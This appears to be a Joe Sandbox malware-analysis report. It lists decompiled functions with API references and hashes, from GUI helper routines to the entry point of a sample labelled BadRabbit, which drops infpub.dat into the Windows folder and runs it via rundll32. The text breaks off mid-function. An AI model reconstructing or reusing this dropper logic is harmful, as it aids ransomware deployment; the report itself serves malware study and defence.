                                                                                                                                                              			E004051A3(struct HWND__* _a4, struct tagPOINT _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                              
                                                                                                                                                              				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0) {
                                                                                                                                                              					MapWindowPoints(0, GetParent(_a4),  &_a8, 2);
                                                                                                                                                              				}
                                                                                                                                                              				return MoveWindow(_a4, _a8.x, _a12, _a16 - _a8, _a20 - _a12, 1);
                                                                                                                                                              			}



                                                                                                                                                              0x004051b6
                                                                                                                                                              0x004051ca
                                                                                                                                                              0x004051ca
                                                                                                                                                              0x004051f0

                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004051AB
                                                                                                                                                              • GetParent.USER32(?), ref: 004051C1
                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000), ref: 004051CA
                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004051E9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$LongMoveParentPoints
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 473562985-0
                                                                                                                                                              • Opcode ID: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                                                                                                                                              • Instruction ID: 050705d4d46781d10eeea3c7f9e2e02fa34a3de8c5ebb1e511241672335786dd
                                                                                                                                                              • Opcode Fuzzy Hash: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                                                                                                                                              • Instruction Fuzzy Hash: 4EF07472140209BFDF019F98DD49FAA3B69FB08751F00C125BE19AA1A0C771D9619B55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004041CF(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				struct HWND__** _t24;
                                                                                                                                                              				signed int _t25;
                                                                                                                                                              				struct HWND__* _t28;
                                                                                                                                                              
                                                                                                                                                              				_t24 = E0040642D( *0x40b428);
                                                                                                                                                              				if( *0x40b26c == 0) {
                                                                                                                                                              					memset(0x40b1d8, 0, 0x94);
                                                                                                                                                              					 *0x40b1d8 = 3;
                                                                                                                                                              					 *0x40b1dc = 0x94;
                                                                                                                                                              					 *0x40b1e0 = E0040416A;
                                                                                                                                                              					 *0x40b250 = E00404680;
                                                                                                                                                              					 *0x40b254 = E004046DA;
                                                                                                                                                              					 *0x40b1e4 = E00404700;
                                                                                                                                                              					 *0x40b26c = 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a24 == 0) {
                                                                                                                                                              					_a24 = 0x409000;
                                                                                                                                                              				}
                                                                                                                                                              				_t25 = _a28;
                                                                                                                                                              				_t26 = _t25 | 0x50020000;
                                                                                                                                                              				_t28 = CreateWindowExA(_t25 >> 0x00000008 & 0x00000200, "Static", _a24, _t25 | 0x50020000, _a8, _a12, _a16, _a20,  *_t24, 0xffffffff,  *0x40b0fc, 0);
                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                              					_t21 = E0040662C( *0x40b424, _a4);
                                                                                                                                                              					 *(_t21 + 0x14) =  *(_t21 + 0x14) | 0xffffffff;
                                                                                                                                                              					 *(_t21 + 0x10) =  *(_t21 + 0x10) | 0xffffffff;
                                                                                                                                                              					_t28 = E004047BB(_t26, _a4, _t21, _t28, 0x40b1d8);
                                                                                                                                                              				}
                                                                                                                                                              				return _t28;
                                                                                                                                                              			}







                                                                                                                                                              0x004041e7
                                                                                                                                                              0x004041ee
                                                                                                                                                              0x004041f9
                                                                                                                                                              0x00404201
                                                                                                                                                              0x0040420b
                                                                                                                                                              0x00404211
                                                                                                                                                              0x0040421b
                                                                                                                                                              0x00404225
                                                                                                                                                              0x0040422f
                                                                                                                                                              0x00404239
                                                                                                                                                              0x00404239
                                                                                                                                                              0x00404247
                                                                                                                                                              0x00404249
                                                                                                                                                              0x00404249
                                                                                                                                                              0x00404250
                                                                                                                                                              0x00404261
                                                                                                                                                              0x0040428b
                                                                                                                                                              0x0040428f
                                                                                                                                                              0x0040429a
                                                                                                                                                              0x0040429f
                                                                                                                                                              0x004042a3
                                                                                                                                                              0x004042b2
                                                                                                                                                              0x004042b2
                                                                                                                                                              0x004042ba

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004041F9
                                                                                                                                                              • CreateWindowExA.USER32(?,Static,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404285
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateWindowmemset
                                                                                                                                                              • String ID: Static
                                                                                                                                                              • API String ID: 1730425660-2272013587
                                                                                                                                                              • Opcode ID: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                                                                                                                                              • Instruction ID: da57442342e235b20ab9d9cc299fb314f46126ddfb0dd979976cb01a117c754a
                                                                                                                                                              • Opcode Fuzzy Hash: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                                                                                                                                              • Instruction Fuzzy Hash: D7215BB1500205AFDB115F51ED09F5B3F69EB85364F00823AFA247A2E1C3BA8921DBDC
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E004044F0(void* __ecx, intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                                                                                                                                              				struct HWND__** _v8;
                                                                                                                                                              				struct HWND__** _t13;
                                                                                                                                                              				struct HWND__* _t32;
                                                                                                                                                              				intOrPtr _t37;
                                                                                                                                                              
                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t13 = E0040642D( *0x40b428);
                                                                                                                                                              				_t37 =  *0x40b3a4; // 0x0
                                                                                                                                                              				_v8 = _t13;
                                                                                                                                                              				if(_t37 == 0) {
                                                                                                                                                              					memset(0x40b310, 0, 0x94);
                                                                                                                                                              					 *0x40b310 = 1;
                                                                                                                                                              					 *0x40b314 = 0x94;
                                                                                                                                                              					 *0x40b320 = E004044D5;
                                                                                                                                                              					 *0x40b324 = E004044B3;
                                                                                                                                                              					 *0x40b3a4 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a24 == 0) {
                                                                                                                                                              					_a24 = 0x409000;
                                                                                                                                                              				}
                                                                                                                                                              				_t32 = CreateWindowExA(0, "Button", _a24, _a28 | 0x50030000, _a8, _a12, _a16, _a20,  *_v8, 0xffffffff,  *0x40b0fc, 0);
                                                                                                                                                              				if(_t32 != 0) {
                                                                                                                                                              					_t32 = E004047BB(_t27, _a4, E0040662C( *0x40b424, _a4), _t32, 0x40b310);
                                                                                                                                                              				}
                                                                                                                                                              				return _t32;
                                                                                                                                                              			}







                                                                                                                                                              0x004044f0
                                                                                                                                                              0x004044f3
                                                                                                                                                              0x004044fd
                                                                                                                                                              0x00404504
                                                                                                                                                              0x0040450a
                                                                                                                                                              0x00404512
                                                                                                                                                              0x0040451c
                                                                                                                                                              0x00404527
                                                                                                                                                              0x0040452c
                                                                                                                                                              0x00404532
                                                                                                                                                              0x0040453c
                                                                                                                                                              0x00404546
                                                                                                                                                              0x00404546
                                                                                                                                                              0x0040454e
                                                                                                                                                              0x00404550
                                                                                                                                                              0x00404550
                                                                                                                                                              0x00404589
                                                                                                                                                              0x0040458d
                                                                                                                                                              0x004045a8
                                                                                                                                                              0x004045a8
                                                                                                                                                              0x004045b0

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040451C
                                                                                                                                                              • CreateWindowExA.USER32(00000000,Button,?,?,?,?,?,?,?,000000FF,00000000), ref: 00404583
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateWindowmemset
                                                                                                                                                              • String ID: Button
                                                                                                                                                              • API String ID: 1730425660-1034594571
                                                                                                                                                              • Opcode ID: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                                                                                                                                              • Instruction ID: c03ed1e6e3b39e81b365a7cda6e144c566f8838bc6f058065528baead89b727a
                                                                                                                                                              • Opcode Fuzzy Hash: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                                                                                                                                              • Instruction Fuzzy Hash: DF118EB2400119BFCB119F55DE45DAB3FB8EB48358B10403AFA15B62A1D3798D20DBEC
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00405625(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				intOrPtr* _t16;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              
                                                                                                                                                              				_t20 = 0xd0d0d0d1;
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					L6:
                                                                                                                                                              					return _t20;
                                                                                                                                                              				}
                                                                                                                                                              				_t11 = GetPropA(_a4, "PB_ID");
                                                                                                                                                              				_t18 = _t11;
                                                                                                                                                              				if(_t11 == GetWindowLongA(_a4, 0xfffffff4)) {
                                                                                                                                                              					_t13 = E00406690( *0x40b424, _t18);
                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                              						_t16 =  *((intOrPtr*)( *((intOrPtr*)(_t13 + 4)) + 8));
                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                              							_t20 =  *_t16(_t13, _a8, _a12, _a16, _a20);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				goto L6;
                                                                                                                                                              			}







                                                                                                                                                              0x0040562d
                                                                                                                                                              0x00405632
                                                                                                                                                              0x00405680
                                                                                                                                                              0x00405684
                                                                                                                                                              0x00405684
                                                                                                                                                              0x0040563d
                                                                                                                                                              0x00405648
                                                                                                                                                              0x00405652
                                                                                                                                                              0x0040565b
                                                                                                                                                              0x00405662
                                                                                                                                                              0x00405667
                                                                                                                                                              0x0040566c
                                                                                                                                                              0x0040567d
                                                                                                                                                              0x0040567d
                                                                                                                                                              0x0040566c
                                                                                                                                                              0x00405662
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetPropA.USER32(00000000,PB_ID), ref: 0040563D
                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F4), ref: 0040564A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LongPropWindow
                                                                                                                                                              • String ID: PB_ID
                                                                                                                                                              • API String ID: 2492497586-4173770792
                                                                                                                                                              • Opcode ID: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                                                                                                                                              • Instruction ID: dcde74696da6f989fa088eeb670c0edb8cd62ec8937a9ae86c05ee9430180859
                                                                                                                                                              • Opcode Fuzzy Hash: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                                                                                                                                              • Instruction Fuzzy Hash: C3F06232100208ABCF115F64DD08E6B7BAAEB54350B44443AFD0DB22A0C736CC61DB98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00404836(struct HWND__* _a4) {
                                                                                                                                                              				struct HWND__* _t5;
                                                                                                                                                              				struct HWND__* _t7;
                                                                                                                                                              
                                                                                                                                                              				_t5 = _a4;
                                                                                                                                                              				_t7 = GetParent(_t5);
                                                                                                                                                              				while(_t7 != 0) {
                                                                                                                                                              					if(GetPropA(_t5, "PB_WindowID") == 0) {
                                                                                                                                                              						_t5 = _t7;
                                                                                                                                                              						_t7 = GetParent(_t7);
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				return _t5;
                                                                                                                                                              			}





                                                                                                                                                              0x00404837
                                                                                                                                                              0x0040485b
                                                                                                                                                              0x00404859
                                                                                                                                                              0x00404854
                                                                                                                                                              0x00404856
                                                                                                                                                              0x0040485b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040485b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404854
                                                                                                                                                              0x00404866

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ParentProp
                                                                                                                                                              • String ID: PB_WindowID
                                                                                                                                                              • API String ID: 919147419-1508741625
                                                                                                                                                              • Opcode ID: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                                                                                                                                              • Instruction ID: eb09f32ff92d9ce12a6399f95510d521de9387f6d8f05edb00c370aed95cd547
                                                                                                                                                              • Opcode Fuzzy Hash: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                                                                                                                                              • Instruction Fuzzy Hash: 5CD0C2B770132167C221662A5C84E4796ACAAD8B60300C43BF701F3251C278CC0182E9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Callgraph

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			_entry_(void* __ebx) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				short _v1568;
                                                                                                                                                              				short _v3128;
                                                                                                                                                              				char _v4688;
                                                                                                                                                              				int _v4692;
                                                                                                                                                              				char _v4696;
                                                                                                                                                              				char _v4700;
                                                                                                                                                              				struct _PROCESS_INFORMATION _v4716;
                                                                                                                                                              				struct _STARTUPINFOW _v4784;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				wchar_t* _t43;
                                                                                                                                                              				signed short* _t44;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				char* _t52;
                                                                                                                                                              				char* _t53;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				wchar_t* _t61;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				signed int _t64;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t70;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				long _t74;
                                                                                                                                                              				wchar_t* _t78;
                                                                                                                                                              				wchar_t** _t79;
                                                                                                                                                              				signed int _t80;
                                                                                                                                                              				void* _t81;
                                                                                                                                                              
                                                                                                                                                              				_t57 = __ebx;
                                                                                                                                                              				E01101660(0x12ac);
                                                                                                                                                              				_v8 =  *0x1108000 ^ _t80;
                                                                                                                                                              				_t79 = GetCommandLineW;
                                                                                                                                                              				_t78 = GetCommandLineW();
                                                                                                                                                              				if(_t78 != 0) {
                                                                                                                                                              					_v4692 = 0;
                                                                                                                                                              					_t79 = CommandLineToArgvW(GetCommandLineW(),  &_v4692);
                                                                                                                                                              					if(_t79 != 0) {
                                                                                                                                                              						if(_v4692 != 1) {
                                                                                                                                                              							_t43 = wcsstr(_t78,  *_t79);
                                                                                                                                                              							_t61 =  *_t79;
                                                                                                                                                              							_t81 = _t81 + 8;
                                                                                                                                                              							_t79 =  &(_t61[0]);
                                                                                                                                                              							do {
                                                                                                                                                              								_t74 =  *_t61;
                                                                                                                                                              								_t61 =  &(_t61[0]);
                                                                                                                                                              							} while (_t74 != 0);
                                                                                                                                                              							_t63 = _t61 - _t79 >> 1;
                                                                                                                                                              							_t44 = _t43 + _t63 * 2;
                                                                                                                                                              							if( *(_t43 + _t63 * 2) == 0x22) {
                                                                                                                                                              								_t44 =  &(_t44[1]);
                                                                                                                                                              							}
                                                                                                                                                              							if( *_t44 == 0x20) {
                                                                                                                                                              								_t44 =  &(_t44[1]);
                                                                                                                                                              							}
                                                                                                                                                              							_t73 =  &_v4688 - _t44;
                                                                                                                                                              							do {
                                                                                                                                                              								_t64 =  *_t44 & 0x0000ffff;
                                                                                                                                                              								 *(_t73 + _t44) = _t64;
                                                                                                                                                              								_t44 =  &(_t44[1]);
                                                                                                                                                              							} while (_t64 != 0);
                                                                                                                                                              						} else {
                                                                                                                                                              							_t56 = 0;
                                                                                                                                                              							do {
                                                                                                                                                              								_t5 = _t56 + 0x1106cf0; // 0x350031
                                                                                                                                                              								_t72 =  *_t5 & 0x0000ffff;
                                                                                                                                                              								 *(_t80 + _t56 - 0x124c) = _t72;
                                                                                                                                                              								_t56 = _t56 + 2;
                                                                                                                                                              							} while (_t72 != 0);
                                                                                                                                                              						}
                                                                                                                                                              						if(GetSystemDirectoryW( &_v1568, 0x30c) != 0) {
                                                                                                                                                              							_t73 =  &_v1568;
                                                                                                                                                              							if(lstrcatW( &_v1568, L"\\rundll32.exe") != 0) {
                                                                                                                                                              								_t48 = E011010C0(_t57,  &_v4696, _t78,  &_v4700); // executed
                                                                                                                                                              								if(_t48 != 0) {
                                                                                                                                                              									_t49 = E01101260(_v4696, _v4700); // executed
                                                                                                                                                              									_t57 = _t57;
                                                                                                                                                              									if(_t49 != 0) {
                                                                                                                                                              										wsprintfW( &_v3128, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1568, L"infpub.dat",  &_v4688);
                                                                                                                                                              										_t69 = 0x10;
                                                                                                                                                              										_t52 =  &_v4716;
                                                                                                                                                              										do {
                                                                                                                                                              											 *_t52 = 0;
                                                                                                                                                              											_t52 = _t52 + 1;
                                                                                                                                                              											_t69 = _t69 - 1;
                                                                                                                                                              										} while (_t69 != 0);
                                                                                                                                                              										_t70 = 0x44;
                                                                                                                                                              										_t53 =  &_v4784;
                                                                                                                                                              										do {
                                                                                                                                                              											 *_t53 = 0;
                                                                                                                                                              											_t53 = _t53 + 1;
                                                                                                                                                              											_t70 = _t70 - 1;
                                                                                                                                                              										} while (_t70 != 0);
                                                                                                                                                              										_t73 =  &_v1568;
                                                                                                                                                              										_v4784.cb = 0x44;
                                                                                                                                                              										CreateProcessW( &_v1568,  &_v3128, _t70, _t70, _t70, 0x8000000, _t70, _t70,  &_v4784,  &_v4716); // executed
                                                                                                                                                              										ExitProcess(0); // executed
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return E01101499(0, _t57, _v8 ^ _t80, _t73, _t78, _t79);
                                                                                                                                                              			}

































                                                                                                                                                              0x011012c0
                                                                                                                                                              0x011012c8
                                                                                                                                                              0x011012d4
                                                                                                                                                              0x011012d8
                                                                                                                                                              0x011012e1
                                                                                                                                                              0x011012e5
                                                                                                                                                              0x011012f2
                                                                                                                                                              0x01101305
                                                                                                                                                              0x01101309
                                                                                                                                                              0x01101316
                                                                                                                                                              0x0110133d
                                                                                                                                                              0x01101343
                                                                                                                                                              0x01101345
                                                                                                                                                              0x01101348
                                                                                                                                                              0x01101350
                                                                                                                                                              0x01101350
                                                                                                                                                              0x01101353
                                                                                                                                                              0x01101356
                                                                                                                                                              0x0110135d
                                                                                                                                                              0x01101364
                                                                                                                                                              0x01101367
                                                                                                                                                              0x01101369
                                                                                                                                                              0x01101369
                                                                                                                                                              0x01101370
                                                                                                                                                              0x01101372
                                                                                                                                                              0x01101372
                                                                                                                                                              0x0110137b
                                                                                                                                                              0x01101380
                                                                                                                                                              0x01101380
                                                                                                                                                              0x01101383
                                                                                                                                                              0x01101387
                                                                                                                                                              0x0110138a
                                                                                                                                                              0x01101318
                                                                                                                                                              0x01101318
                                                                                                                                                              0x01101320
                                                                                                                                                              0x01101320
                                                                                                                                                              0x01101320
                                                                                                                                                              0x01101327
                                                                                                                                                              0x0110132f
                                                                                                                                                              0x01101332
                                                                                                                                                              0x01101337
                                                                                                                                                              0x011013a3
                                                                                                                                                              0x011013ae
                                                                                                                                                              0x011013bd
                                                                                                                                                              0x011013d0
                                                                                                                                                              0x011013d7
                                                                                                                                                              0x011013eb
                                                                                                                                                              0x011013f0
                                                                                                                                                              0x011013f3
                                                                                                                                                              0x01101418
                                                                                                                                                              0x01101421
                                                                                                                                                              0x01101426
                                                                                                                                                              0x01101430
                                                                                                                                                              0x01101430
                                                                                                                                                              0x01101433
                                                                                                                                                              0x01101434
                                                                                                                                                              0x01101434
                                                                                                                                                              0x01101437
                                                                                                                                                              0x0110143c
                                                                                                                                                              0x01101442
                                                                                                                                                              0x01101442
                                                                                                                                                              0x01101445
                                                                                                                                                              0x01101446
                                                                                                                                                              0x01101446
                                                                                                                                                              0x01101468
                                                                                                                                                              0x0110146f
                                                                                                                                                              0x01101479
                                                                                                                                                              0x01101481
                                                                                                                                                              0x01101481
                                                                                                                                                              0x011013f3
                                                                                                                                                              0x011013d7
                                                                                                                                                              0x011013bd
                                                                                                                                                              0x011013a3
                                                                                                                                                              0x01101309
                                                                                                                                                              0x01101498

                                                                                                                                                              APIs
                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 011012DF
                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 011012FC
                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 011012FF
                                                                                                                                                              • wcsstr.MSVCRT ref: 0110133D
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0110139B
                                                                                                                                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 011013B5
                                                                                                                                                              • wsprintfW.USER32 ref: 01101418
                                                                                                                                                              • CreateProcessW.KERNELBASE ref: 01101479
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 01101481
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                                                                                                                                              • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                                                                                                                                              • API String ID: 39178828-1758013632
                                                                                                                                                              • Opcode ID: a3618dd4d8b5db05186dab4f7b7de5c70c047727e8bf75508c83c831e325a93d
                                                                                                                                                              • Instruction ID: e89ab69067932b1d6e519863c316a7df356bc9888540ae5207f86411f7c4aa99
                                                                                                                                                              • Opcode Fuzzy Hash: a3618dd4d8b5db05186dab4f7b7de5c70c047727e8bf75508c83c831e325a93d
                                                                                                                                                              • Instruction Fuzzy Hash: E341C371D00218ABDB3EDB58CC95BEA7378EF44300F054599EA06D7194EBB89AA4CB61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                              			E011010C0(void* __ebx, long* __ecx, void* __edi, void** _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				short _v1568;
                                                                                                                                                              				long _v1572;
                                                                                                                                                              				WCHAR* _v1576;
                                                                                                                                                              				char _v1580;
                                                                                                                                                              				long* _v1584;
                                                                                                                                                              				void** _v1588;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t46;
                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				void* _t52;
                                                                                                                                                              				long _t56;
                                                                                                                                                              				void* _t58;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				int _t65;
                                                                                                                                                              				void* _t66;
                                                                                                                                                              				int _t67;
                                                                                                                                                              				void* _t68;
                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                              				void* _t70;
                                                                                                                                                              				long _t76;
                                                                                                                                                              				void* _t77;
                                                                                                                                                              				void _t85;
                                                                                                                                                              				void* _t89;
                                                                                                                                                              				void* _t91;
                                                                                                                                                              				void* _t92;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t97;
                                                                                                                                                              				signed int _t98;
                                                                                                                                                              
                                                                                                                                                              				_t89 = __edi;
                                                                                                                                                              				_t66 = __ebx;
                                                                                                                                                              				_v8 =  *0x1108000 ^ _t98;
                                                                                                                                                              				_t86 =  &_v1568;
                                                                                                                                                              				_v1588 = _a4;
                                                                                                                                                              				_v1584 = __ecx;
                                                                                                                                                              				_v1576 = 0;
                                                                                                                                                              				if(GetModuleFileNameW(GetModuleHandleW(0),  &_v1568, 0x30c) == 0) {
                                                                                                                                                              					L17:
                                                                                                                                                              					return E01101499(0, _t66, _v8 ^ _t98, _t86, _t89, 0);
                                                                                                                                                              				} else {
                                                                                                                                                              					_t46 = E01101000( &_v1568,  &_v1572,  &_v1580); // executed
                                                                                                                                                              					if(_t46 == 0) {
                                                                                                                                                              						goto L17;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t76 = _v1572;
                                                                                                                                                              						_t47 =  *((intOrPtr*)(_t76 + 0x3c));
                                                                                                                                                              						_t48 = _t47 + _t76;
